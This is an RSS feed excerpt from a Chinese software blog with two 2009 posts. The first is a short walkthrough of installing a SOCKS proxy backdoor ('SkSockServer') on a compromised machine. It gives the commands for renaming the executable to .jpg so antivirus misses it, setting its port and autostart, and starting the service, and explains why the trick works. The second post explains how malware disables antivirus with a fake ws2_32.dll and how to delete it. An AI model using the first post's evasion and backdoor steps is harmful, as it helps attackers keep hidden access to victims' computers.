杀毒软件 – 嗨软 https://ihacksoft.com/archive 分享最好用的常用软件 Tue, 22 Nov 2022 02:41:09 +0000 zh-CN hourly 1 https://wordpress.org/?v=4.9.26 巧妙利用扩展名让我们的木马躲过杀毒软件与防火墙 https://ihacksoft.com/archive/1137.html https://ihacksoft.com/archive/1137.html#respond Wed, 16 Dec 2009 01:33:32 +0000 https://ihacksoft.com/?p=1866 E:\>SkSockServer -install
显示“拒绝访问”。
原因是被肉鸡上的杀毒软件拦截了。 ]]>
我在肉鸡CMD下安装一个代理跳板后门。

执行:
E:\>SkSockServer -install

显示“拒绝访问”。
原因是被肉鸡上的杀毒软件拦截了!

怎么办?如何绕过杀毒软件或者防火墙?我把SkSockServer.exe改成SkSockServer.jpg,然后执行。

E:\>SkSockServer.jpg -install

Snake SockProxy Service installed.
  
E:\>SkSockServer.jpg -config port 1800

The Port value have set to 1800
  
E:\>SkSockServer.jpg -config starttype 2

The New StartType have set to 2 -- Auto

E:\>net start skserver
  
Snake SockProxy Service 服务正在启动 .
  
nake SockProxy Service 服务已经启动成功。

Ok!成功! 
  
现在我们不怕杀毒软件了!而其他的在命令行执行的程序也可以用这种方法。
  
原理讲解:

其实原理很简单,我们利用了cmd判定文件类型的方法。在CMD中,系统首先判定文件的类型是否是执行文件,判定方法不是文件扩展名,而是文件头的PE段。如是执行文件,则执行它。如不是,再根据相应的关联启动相应程序。如没有输入扩展名,则系统将默认扩展名为BAT,EXE,COM,依次判定。也就是说,程序更改了扩展名后,只有cmd.exe能“认”出它来,因为cmd不是根据扩展名来判定文件类型的。而Windows是靠扩展名来判定文件类型的。这样,我们就可以骗过Windows和杀毒软件。

]]>
https://ihacksoft.com/archive/1137.html/feed 0
关于杀毒软件“应用程序正常初始化(0xc00000ba)失败”的解决方法 https://ihacksoft.com/archive/1046.html https://ihacksoft.com/archive/1046.html#respond Sun, 08 Nov 2009 08:50:36 +0000 https://ihacksoft.com/?p=1775 ws2_32.dll。 ]]>   以前同学的360安全卫生打开时会出现“应用程序正常初始化(0xc00000ba)失败”的提示。其实不仅仅是360安全卫生,有的时候你会发现打开杀毒软件时也会出现这样的错误提示,什么情况呢?这里我们首先来了解一个DLL文件—ws2_32.dll

  ws2_32.dll是Windows Sockets应用程序接口,用于支持Internet和网络应用程序。程序运行时会自动调用ws2_32.dll文件,ws2_32.dll是个动态链接库文件,位于系统文件夹中。Windows在查找动态链接库文件时,会先在应用程序当前目录搜索,如果没有找到然后才会搜索Windows所在目录,如果还是没有会搜索system32和system目录。一些病毒利用此原理在杀软目录中建立了ws2_32.dll文件或文件夹,在杀软看来这是一个它需要的文件而调用,这个所谓的“文件”又不具备真正地ws2_32.dll文件所具有的功能,所以杀软就无法运行了。提示:应用程序正常初始化(0xc00000ba)失败。

  知道了原理,解决方法也就自然而然出来了。到杀毒软件的安装目录找到以"ws2_32.dll"命名的文件或文件夹,删除即可。注意:如果看不到"ws2_32.dll"文件夹,原因是该文件夹加了系统隐藏属性,即使找到"ws2_32.dll"文件夹也无法删除,原因是里面有一个名为1.的文件夹。该文件夹windows环境不能识别,因此出现系统找不到路径的提示。这里我们可以用rm /q /s命令将此文件删除。

]]>
https://ihacksoft.com/archive/1046.html/feed 0